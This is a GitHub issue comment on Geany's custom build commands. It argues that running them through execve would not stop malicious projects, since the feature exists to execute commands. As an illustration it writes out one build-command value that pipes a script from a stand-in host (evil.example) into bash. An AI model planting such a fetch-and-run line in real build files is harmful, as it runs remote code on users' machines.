dolik-rce left a comment (geany/geany#4610) Pardon my ignorance, but I don't understand how the recommended fix would help? Executing commands is what the "custom build commands" feature does. If it is implemented with `execve` the attacker still has the same opportunity to run anything, including `/bin/sh`. They would just use `NF_00_CM=sh -c 'make; curl http://evil.example/payload.sh | bash'` instead (or hide the evil curl call in the makefile).
I think that there is no way to implement this "safely", it is just as if you download shellscript, Makefile, Gradle project or literally anything that is *intended* to run commands - the user should always carefully inspect those before running them. Aside from that, running multiple chained commands is a feature that I personally use in some projects. -- Reply to this email directly or view it on GitHub: https://github.com/geany/geany/issues/4610#issuecomment-4829000152 You are receiving this because you are subscribed to this thread. Message ID: <geany/geany/issues/4610/[email protected]>
